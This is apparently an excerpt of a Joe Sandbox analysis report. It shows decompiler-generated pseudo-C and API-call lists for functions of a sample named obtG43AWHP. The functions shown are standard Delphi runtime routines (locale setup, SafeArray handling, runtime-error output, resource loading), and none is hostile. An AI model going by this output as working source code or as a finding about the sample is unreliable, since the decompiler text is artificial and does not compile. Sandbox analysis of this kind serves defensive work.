				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _t104;
				void* _t111;
				void* _t133;
				intOrPtr _t183;
				intOrPtr _t193;
				intOrPtr _t194;

				_t191 = __esi;
				_t190 = __edi;
				_t193 = _t194;
				_t133 = 8;
				do {
					_push(0);
					_push(0);
					_t133 = _t133 - 1;
				} while (_t133 != 0);
				_push(__ebx);
				_push(_t193);
				_push(0x40b7df);
				_push( *[fs:eax]);
				 *[fs:eax] = _t194;
				E0040B3A0();
				E00409E60(__ebx, __edi, __esi);
				_t196 =  *0x454744;
				if( *0x454744 != 0) {
					E0040A038(__esi, _t196);
				}
				_t132 = GetThreadLocale();
				E00409DB0(_t43, 0, 0x14,  &_v20);
				E00403EDC(0x454678, _v20);
				E00409DB0(_t43, 0x40b7f4, 0x1b,  &_v24);
				 *0x45467c = E00407174(0x40b7f4, 0, _t196);
				E00409DB0(_t132, 0x40b7f4, 0x1c,  &_v28);
				 *0x45467d = E00407174(0x40b7f4, 0, _t196);
				 *0x45467e = E00409DFC(_t132, 0x2c, 0xf);
				 *0x45467f = E00409DFC(_t132, 0x2e, 0xe);
				E00409DB0(_t132, 0x40b7f4, 0x19,  &_v32);
				 *0x454680 = E00407174(0x40b7f4, 0, _t196);
				 *0x454681 = E00409DFC(_t132, 0x2f, 0x1d);
				E00409DB0(_t132, "m/d/yy", 0x1f,  &_v40);
				E0040A0E8(_v40, _t132,  &_v36, _t190, _t191, _t196);
				E00403EDC(0x454684, _v36);
				E00409DB0(_t132, "mmmm d, yyyy", 0x20,  &_v48);
				E0040A0E8(_v48, _t132,  &_v44, _t190, _t191, _t196);
				E00403EDC(0x454688, _v44);
				 *0x45468c = E00409DFC(_t132, 0x3a, 0x1e);
				E00409DB0(_t132, 0x40b828, 0x28,  &_v52);
				E00403EDC(0x454690, _v52);
				E00409DB0(_t132, 0x40b834, 0x29,  &_v56);
				E00403EDC(0x454694, _v56);
				E00403E88( &_v12);
				E00403E88( &_v16);
				E00409DB0(_t132, 0x40b7f4, 0x25,  &_v60);
				_t104 = E00407174(0x40b7f4, 0, _t196);
				_t197 = _t104;
				if(_t104 != 0) {
					E00403F20( &_v8, 0x40b84c);
				} else {
					E00403F20( &_v8, 0x40b840);
				}
				E00409DB0(_t132, 0x40b7f4, 0x23,  &_v64);
				_t111 = E00407174(0x40b7f4, 0, _t197);
				_t198 = _t111;
				if(_t111 == 0) {
					E00409DB0(_t132, 0x40b7f4, 0x1005,  &_v68);
					if(E00407174(0x40b7f4, 0, _t198) != 0) {
						E00403F20( &_v12, 0x40b868);
					} else {
						E00403F20( &_v16, 0x40b858);
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E00404208();
				_push(_v12);
				_push(_v8);
				_push(":mm:ss");
				_push(_v16);
				E00404208();
				 *0x454746 = E00409DFC(_t132, 0x2c, 0xc);
				_pop(_t183);
				 *[fs:eax] = _t183;
				_push(E0040B7E6);
				return E00403EAC( &_v68, 0x10);
			}

























    0x0040b514
    0x0040b514
    0x0040b515
    0x0040b517
    0x0040b51c
    0x0040b51c
    0x0040b51e
    0x0040b520
    0x0040b520
    0x0040b523
    0x0040b526
    0x0040b527
    0x0040b52c
    0x0040b52f
    0x0040b532
    0x0040b537
    0x0040b53c
    0x0040b543
    0x0040b545
    0x0040b545
    0x0040b54f
    0x0040b55e
    0x0040b56b
    0x0040b580
    0x0040b58f
    0x0040b5a4
    0x0040b5b3
    0x0040b5c6
    0x0040b5d9
    0x0040b5ee
    0x0040b5fd
    0x0040b610
    0x0040b625
    0x0040b630
    0x0040b63d
    0x0040b652
    0x0040b65d
    0x0040b66a
    0x0040b67d
    0x0040b692
    0x0040b69f
    0x0040b6b4
    0x0040b6c1
    0x0040b6c9
    0x0040b6d1
    0x0040b6e6
    0x0040b6f0
    0x0040b6f5
    0x0040b6f7
    0x0040b710
    0x0040b6f9
    0x0040b701
    0x0040b701
    0x0040b725
    0x0040b72f
    0x0040b734
    0x0040b736
    0x0040b748
    0x0040b759
    0x0040b772
    0x0040b75b
    0x0040b763
    0x0040b763
    0x0040b759
    0x0040b777
    0x0040b77a
    0x0040b77d
    0x0040b782
    0x0040b78f
    0x0040b794
    0x0040b797
    0x0040b79a
    0x0040b79f
    0x0040b7ac
    0x0040b7bf
    0x0040b7c6
    0x0040b7c9
    0x0040b7cc
    0x0040b7de

    APIs
      • Part of subcall function 0040B3A0: GetThreadLocale.KERNEL32 ref: 0040B3CA
      • Part of subcall function 0040B3A0: GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040B494
      • Part of subcall function 0040B3A0: GetSystemMetrics.USER32(0000004A), ref: 0040B4BF
      • Part of subcall function 0040B3A0: GetSystemMetrics.USER32(0000002A), ref: 0040B4D0
      • Part of subcall function 00409E60: GetThreadLocale.KERNEL32(00000000,00409F73,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409E7C
    • GetThreadLocale.KERNEL32(00000000,0040B7DF,?,?,00000000,00000000), ref: 0040B54A
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
      • Part of subcall function 00409DFC: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B5C6,00000000,0040B7DF,?,?,00000000,00000000), ref: 00409E0F
      • Part of subcall function 0040A0E8: GetThreadLocale.KERNEL32(?,00000000,0040A2B2,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A117
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(?,00000000,0040A0CF,?,?,00000000), ref: 0040A050
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040A0CF,?,?,00000000), ref: 0040A080
      • Part of subcall function 0040A038: EnumCalendarInfoA.KERNEL32(Function_00009F84,00000000,00000000,00000004), ref: 0040A08B
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040A0CF,?,?,00000000), ref: 0040A0A9
      • Part of subcall function 0040A038: EnumCalendarInfoA.KERNEL32(Function_00009FC0,00000000,00000000,00000003), ref: 0040A0B4
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 0040DBC0, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139
    C-Code - Quality: 77%
    			E0040DBC0(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				void* __ebp;
				signed char _t47;
				signed int _t54;
				void* _t62;
				intOrPtr* _t73;
				intOrPtr* _t91;
				void* _t93;
				void* _t95;
				void* _t98;
				void* _t99;
				intOrPtr* _t108;
				void* _t112;
				intOrPtr _t113;
				char* _t114;
				void* _t115;

				_t100 = __ecx;
				_v780 = __ecx;
				_t91 = __edx;
				_v776 = __eax;
				if(( *(__edx + 1) & 0x00000020) == 0) {
					E0040D7EC(0x80070057);
				}
				_t47 =  *_t91;
				if((_t47 & 0x00000fff) != 0xc) {
					_push(_t91);
					_push(_v776);
					L0040C5A0();
					return E0040D7EC(_v776);
				} else {
					if((_t47 & 0x00000040) == 0) {
						_v792 =  *((intOrPtr*)(_t91 + 8));
					} else {
						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
					}
					_v788 =  *_v792 & 0x0000ffff;
					_t93 = _v788 - 1;
					if(_t93 < 0) {
						L9:
						_push( &_v772);
						_t54 = _v788;
						_push(_t54);
						_push(0xc);
						L0040C9F4();
						_t113 = _t54;
						if(_t113 == 0) {
							E0040D544(_t100);
						}
						E0040DB18(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _t113;
						_t95 = _v788 - 1;
						if(_t95 < 0) {
							L14:
							_t97 = _v788 - 1;
							if(E0040DB34(_v788 - 1, _t115) != 0) {
								L0040CA0C();
								E0040D7EC(_v792);
								L0040CA0C();
								E0040D7EC( &_v260);
								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
							}
							_t62 = E0040DB64(_t97, _t115);
						} else {
							_t98 = _t95 + 1;
							_t73 =  &_v768;
							_t108 =  &_v260;
							do {
								 *_t108 =  *_t73;
								_t108 = _t108 + 4;
								_t73 = _t73 + 8;
								_t98 = _t98 - 1;
							} while (_t98 != 0);
							do {
								goto L14;
							} while (_t62 != 0);
							return _t62;
						}
					} else {
						_t99 = _t93 + 1;
						_t112 = 0;
						_t114 =  &_v772;
						do {
							_v804 = _t114;
							_push(_v804 + 4);
							_t18 = _t112 + 1; // 0x1
							_push(_v792);
							L0040C9FC();
							E0040D7EC(_v792);
							_push( &_v784);
							_t21 = _t112 + 1; // 0x1
							_push(_v792);
							L0040CA04();
							E0040D7EC(_v792);
							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
							_t112 = _t112 + 1;
							_t114 = _t114 + 8;
							_t99 = _t99 - 1;
						} while (_t99 != 0);
						goto L9;
					}
				}
			}





























    0x0040dbc0
    0x0040dbcc
    0x0040dbd2
    0x0040dbd4
    0x0040dbde
    0x0040dbe5
    0x0040dbe5
    0x0040dbea
    0x0040dbf8
    0x0040dd71
    0x0040dd78
    0x0040dd79
    0x00000000
    0x0040dbfe
    0x0040dc01
    0x0040dc13
    0x0040dc03
    0x0040dc08
    0x0040dc08
    0x0040dc22
    0x0040dc2e
    0x0040dc31
    0x0040dc9e
    0x0040dca4
    0x0040dca5
    0x0040dcab
    0x0040dcac
    0x0040dcae
    0x0040dcb3
    0x0040dcb7
    0x0040dcb9
    0x0040dcb9
    0x0040dcc4
    0x0040dccf
    0x0040dcda
    0x0040dce3
    0x0040dce6
    0x0040dd02
    0x0040dd09
    0x0040dd14
    0x0040dd2b
    0x0040dd30
    0x0040dd44
    0x0040dd49
    0x0040dd5c
    0x0040dd5c
    0x0040dd65
    0x0040dce8
    0x0040dce8
    0x0040dce9
    0x0040dcef
    0x0040dcf5
    0x0040dcf7
    0x0040dcf9
    0x0040dcfc
    0x0040dcff
    0x0040dcff
    0x0040dd02
    0x00000000
    0x00000000
    0x00000000
    0x0040dd02
    0x0040dc33
    0x0040dc33
    0x0040dc34
    0x0040dc36
    0x0040dc3c
    0x0040dc3e
    0x0040dc4d
    0x0040dc4e
    0x0040dc58
    0x0040dc59
    0x0040dc5e
    0x0040dc69
    0x0040dc6a
    0x0040dc74
    0x0040dc75
    0x0040dc7a
    0x0040dc95
    0x0040dc97
    0x0040dc98
    0x0040dc9b
    0x0040dc9b
    0x00000000
    0x0040dc3c
    0x0040dc31

    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040DC59
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040DC75
    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040DCAE
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040DD2B
    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040DD44
    • VariantCopy.OLEAUT32(?), ref: 0040DD79
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 00403C90, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38
    C-Code - Quality: 79%
    			E00403C90(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x454044 == 0) {
					if( *0x419030 == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x454218 == 0xd7b2 &&  *0x454220 > 0) {
						 *0x454230();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E00403D18, 2,  &_v4, 0);
				}
			}





    0x00403c98
    0x00403cf8
    0x00403d08
    0x00403d08
    0x00403d0e
    0x00403c9a
    0x00403ca3
    0x00403cb3
    0x00403cb3
    0x00403ccf
    0x00403cf0
    0x00403cf0

    APIs
    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
    • GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
    • WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 0040B9A0, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 41
    C-Code - Quality: 100%
    			E0040B9A0() {
				struct HINSTANCE__** _t2;
				void* _t3;
				struct HINSTANCE__** _t5;
				struct HRSRC__* _t7;
				struct HINSTANCE__** _t8;
				intOrPtr* _t11;
				intOrPtr* _t12;
				struct HINSTANCE__* _t13;

				_t2 =  *0x452f9c; // 0x45402c
				if( *_t2 != 0) {
					_t5 =  *0x452f9c; // 0x45402c
					_t7 = FindResourceA( *_t5, "DVCLAL", 0xa);
					_t8 =  *0x452f9c; // 0x45402c
					return LoadResource( *_t8, _t7);
				}
				_t3 = 0;
				_t11 =  *0x4530b8; // 0x419034
				_t12 =  *_t11;
				if(_t12 != 0) {
					while(1) {
						_t13 =  *(_t12 + 4);
						_t3 = LoadResource(_t13, FindResourceA(_t13, "DVCLAL", 0xa));
						if(_t3 != 0) {
							goto L5;
						}
						_t12 =  *_t12;
						if(_t12 != 0) {
							continue;
						}
						goto L5;
					}
				}
				L5:
				return _t3;
			}











    0x0040b9a3
    0x0040b9ab
    0x0040b9b4
    0x0040b9bc
    0x0040b9c2
    0x00000000
    0x0040b9ca
    0x0040b9d1
    0x0040b9d3
    0x0040b9d9
    0x0040b9dd
    0x0040b9df
    0x0040b9e8
    0x0040b9f3
    0x0040b9fa
    0x00000000
    0x00000000
    0x0040b9fc
    0x0040ba00
    0x00000000
    0x00000000
    0x00000000
    0x0040ba00
    0x0040b9df
    0x0040ba05
    0x0040ba05

    APIs
    • FindResourceA.KERNEL32(00400000,DVCLAL,0000000A), ref: 0040B9BC
    • LoadResource.KERNEL32(00400000,00000000,00400000,DVCLAL,0000000A,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3), ref: 0040B9CA
    • FindResourceA.KERNEL32(?,DVCLAL,0000000A), ref: 0040B9EC
    • LoadResource.KERNEL32(?,00000000,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3,00416F00,00000000,00417553), ref: 0040B9F3
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 00405945, Relevance: 9.0, APIs: 6, Instructions: 41
    C-Code - Quality: 100%
    			E00405945(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
				long _t11;
				void* _t16;

				_t16 = __ebx;
				 *__edi =  *__edi + __ecx;
				 *((intOrPtr*)(__eax - 0x4545b4)) =  *((intOrPtr*)(__eax - 0x4545b4)) + __eax - 0x4545b4;
				 *0x419008 = 2;
				 *0x454014 = 0x4011a8;
				 *0x454018 = 0x4011b0;
				 *0x454046 = 2;
				 *0x454000 = E00404B04;
				if(E00402F5C() != 0) {
					_t3 = E00402F8C();
				}
				E00403050(_t3);
				 *0x45404c = 0xd7b0;
				 *0x454218 = 0xd7b0;
				 *0x4543e4 = 0xd7b0;
				 *0x45403c = GetCommandLineA();
				 *0x454038 = E004012C0();
				if((GetVersion() & 0x80000000) == 0x80000000) {
					 *0x4545b8 = E0040587C(GetThreadLocale(), _t16, __eflags);
				} else {
					if((GetVersion() & 0x000000ff) <= 4) {
						 *0x4545b8 = E0040587C(GetThreadLocale(), _t16, __eflags);
					} else {
						 *0x4545b8 = 3;
					}
				}
				_t11 = GetCurrentThreadId();
				 *0x454030 = _t11;
				return _t11;
			}





    0x00405945
    0x0040594a
    0x0040594f
    0x00405951
    0x00405958
    0x00405962
    0x0040596c
    0x00405973
    0x00405984
    0x00405986
    0x00405986
    0x0040598b
    0x00405990
    0x00405999
    0x004059a2
    0x004059b0
    0x004059ba
    0x004059ce
    0x00405a07
    0x004059d0
    0x004059de
    0x004059f6
    0x004059e0
    0x004059e0
    0x004059e0
    0x004059de
    0x00405a0c
    0x00405a11
    0x00405a16

    APIs
      • Part of subcall function 00402F5C: GetKeyboardType.USER32(00000000), ref: 00402F61
      • Part of subcall function 00402F5C: GetKeyboardType.USER32(00000001), ref: 00402F6D
    • GetCommandLineA.KERNEL32 ref: 004059AB
      • Part of subcall function 004012C0: GetStartupInfoA.KERNEL32 ref: 004012CA
    • GetVersion.KERNEL32 ref: 004059BF
    • GetVersion.KERNEL32 ref: 004059D0
    • GetThreadLocale.KERNEL32 ref: 004059EC
    • GetThreadLocale.KERNEL32 ref: 004059FD
      • Part of subcall function 0040587C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    • GetCurrentThreadId.KERNEL32 ref: 00405A0C
      • Part of subcall function 00402F8C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FAE
      • Part of subcall function 00402F8C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FE1
      • Part of subcall function 00402F8C: RegCloseKey.ADVAPI32(?,00403004,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FF7
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 0040A980, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 107
    C-Code - Quality: 86%
    			E0040A980(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				char _v297;
				char _v304;
				intOrPtr _v308;
				char _v312;
				char _v316;
				char _v320;
				intOrPtr _v324;
				char _v328;
				void* _v332;
				char _v336;
				char _v340;
				char _v344;
				char _v348;
				intOrPtr _v352;
				char _v356;
				char _v360;
				char _v364;
				void* _v368;
				char _v372;
				intOrPtr _t52;
				intOrPtr _t60;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr _t89;
				intOrPtr _t101;
				void* _t108;
				intOrPtr _t110;
				void* _t113;

				_t108 = __edi;
				_v372 = 0;
				_v336 = 0;
				_v344 = 0;
				_v340 = 0;
				_v8 = 0;
				_push(_t113);
				_push(0x40ab3b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t113 + 0xfffffe90;
				_t89 =  *((intOrPtr*)(_a4 - 4));
				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
					_t52 =  *0x453064; // 0x405f58
					E00405824(_t52,  &_v8);
				} else {
					_t86 =  *0x453120; // 0x405f50
					E00405824(_t86,  &_v8);
				}
				_t110 =  *((intOrPtr*)(_t89 + 0x18));
				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
					_v368 =  *(_t89 + 0xc);
					_v364 = 5;
					_v360 = _v8;
					_v356 = 0xb;
					_v352 = _t110;
					_v348 = 5;
					_t60 =  *0x453068; // 0x405f00
					E00405824(_t60,  &_v372);
					E0040A5A8(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
				} else {
					_v332 =  *(_t89 + 0xc);
					_v328 = 5;
					E004040F8( &_v340, 0x105,  &_v297);
					E00407660(_v340,  &_v336);
					_v324 = _v336;
					_v320 = 0xb;
					_v316 = _v8;
					_v312 = 0xb;
					_v308 = _t110;
					_v304 = 5;
					_t82 =  *0x4530a0; // 0x405ff8
					E00405824(_t82,  &_v344);
					E0040A5A8(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
				}
				_pop(_t101);
				 *[fs:eax] = _t101;
				_push(E0040AB42);
				E00403E88( &_v372);
				E00403EAC( &_v344, 3);
				return E00403E88( &_v8);
			}

































    0x0040a980
    0x0040a98d
    0x0040a993
    0x0040a999
    0x0040a99f
    0x0040a9a5
    0x0040a9aa
    0x0040a9ab
    0x0040a9b0
    0x0040a9b3
    0x0040a9b9
    0x0040a9c0
    0x0040a9d4
    0x0040a9d9
    0x0040a9c2
    0x0040a9c5
    0x0040a9ca
    0x0040a9ca
    0x0040a9de
    0x0040a9eb
    0x0040a9f7
    0x0040aab3
    0x0040aab9
    0x0040aac3
    0x0040aac9
    0x0040aad0
    0x0040aad6
    0x0040aaec
    0x0040aaf1
    0x0040ab03
    0x0040aa1a
    0x0040aa1d
    0x0040aa23
    0x0040aa3b
    0x0040aa4c
    0x0040aa57
    0x0040aa5d
    0x0040aa67
    0x0040aa6d
    0x0040aa74
    0x0040aa7a
    0x0040aa90
    0x0040aa95
    0x0040aaa7
    0x0040aaac
    0x0040ab0c
    0x0040ab0f
    0x0040ab12
    0x0040ab1d
    0x0040ab2d
    0x0040ab3a

    APIs
      • Part of subcall function 00405824: LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00405855
    • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040AB3B), ref: 0040A9EB
    • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040AB3B), ref: 0040AA0D
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 0040A31C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102
    C-Code - Quality: 100%
    			E0040A31C(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t73;
				intOrPtr _t74;
				intOrPtr _t83;
				intOrPtr _t86;
				intOrPtr* _t87;
				void* _t93;

				_t93 = __fp0;
				_v8 = __ecx;
				_t73 = __edx;
				_t87 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x454660; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0040A310(_t73);
				} else {
					_v12 = _t73 - _v820.AllocationBase;
				}
				E0040778C( &_v273, 0x104, E0040B24C(0x5c) + 1);
				_t74 = 0x40a49c;
				_t86 = 0x40a49c;
				_t83 =  *0x406188; // 0x4061d4
				if(E004032A0(_t87, _t83) != 0) {
					_t74 = E00404348( *((intOrPtr*)(_t87 + 4)));
					_t69 = E00407764(_t74, 0x40a49c);
					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
						_t86 = 0x40a4a0;
					}
				}
				_t51 =  *0x453108; // 0x405f28
				_t16 = _t51 + 4; // 0xffe8
				_t53 =  *0x454660; // 0x400000
				LoadStringA(E00404DCC(_t53),  *_t16,  &_v790, 0x100);
				E00403064( *_t87,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t74;
				_v832 = 6;
				_v828 = _t86;
				_v824 = 6;
				E00407CAC(_v8,  &_v790, _a4, _t93, 4,  &_v860);
				return E00407764(_v8, _t86);
			}































    0x0040a31c
    0x0040a328
    0x0040a32b
    0x0040a32d
    0x0040a339
    0x0040a348
    0x0040a372
    0x0040a378
    0x0040a384
    0x0040a389
    0x0040a38f
    0x0040a38f
    0x0040a3ad
    0x0040a3b2
    0x0040a3b7
    0x0040a3be
    0x0040a3cb
    0x0040a3d5
    0x0040a3d9
    0x0040a3e0
    0x0040a3e9
    0x0040a3e9
    0x0040a3e0
    0x0040a3fa
    0x0040a3ff
    0x0040a403
    0x0040a40e
    0x0040a41b
    0x0040a426
    0x0040a42c
    0x0040a439
    0x0040a43f
    0x0040a449
    0x0040a44f
    0x0040a456
    0x0040a45c
    0x0040a463
    0x0040a469
    0x0040a485
    0x0040a498

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
    • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 0040A31A, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101
    C-Code - Quality: 100%
    			E0040A31A(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t85;
				intOrPtr _t89;
				intOrPtr* _t92;
				void* _t105;

				_v8 = __ecx;
				_t74 = __edx;
				_t92 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x454660; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0040A310(_t74);
				} else {
					_v12 = _t74 - _v820.AllocationBase;
				}
				E0040778C( &_v273, 0x104, E0040B24C(0x5c) + 1);
				_t75 = 0x40a49c;
				_t89 = 0x40a49c;
				_t85 =  *0x406188; // 0x4061d4
				if(E004032A0(_t92, _t85) != 0) {
					_t75 = E00404348( *((intOrPtr*)(_t92 + 4)));
					_t69 = E00407764(_t75, 0x40a49c);
					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
						_t89 = 0x40a4a0;
					}
				}
				_t51 =  *0x453108; // 0x405f28
				_t16 = _t51 + 4; // 0xffe8
				_t53 =  *0x454660; // 0x400000
				LoadStringA(E00404DCC(_t53),  *_t16,  &_v790, 0x100);
				E00403064( *_t92,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t75;
				_v832 = 6;
				_v828 = _t89;
				_v824 = 6;
				E00407CAC(_v8,  &_v790, _a4, _t105, 4,  &_v860);
				return E00407764(_v8, _t89);
			}































    0x0040a328
    0x0040a32b
    0x0040a32d
    0x0040a339
    0x0040a348
    0x0040a372
    0x0040a378
    0x0040a384
    0x0040a389
    0x0040a38f
    0x0040a38f
    0x0040a3ad
    0x0040a3b2
    0x0040a3b7
    0x0040a3be
    0x0040a3cb
    0x0040a3d5
    0x0040a3d9
    0x0040a3e0
    0x0040a3e9
    0x0040a3e9
    0x0040a3e0
    0x0040a3fa
    0x0040a3ff
    0x0040a403
    0x0040a40e
    0x0040a41b
    0x0040a426
    0x0040a42c
    0x0040a439
    0x0040a43f
    0x0040a449
    0x0040a44f
    0x0040a456
    0x0040a45c
    0x0040a463
    0x0040a469
    0x0040a485
    0x0040a498

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
    • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
